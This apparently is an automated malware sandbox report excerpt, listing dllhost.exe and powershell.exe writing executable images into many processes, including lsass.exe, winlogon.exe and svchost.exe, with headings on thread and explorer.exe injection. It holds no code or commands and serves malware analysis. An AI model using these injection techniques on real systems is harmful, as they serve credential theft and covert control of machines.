Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D865090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 199015D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 188D6710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 29F37400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 2580 base: 32F0000 value: 4D
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 2580 base: 32F0000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 5968	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 6808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2844

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: 5968 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 2F00000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 947DB66010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
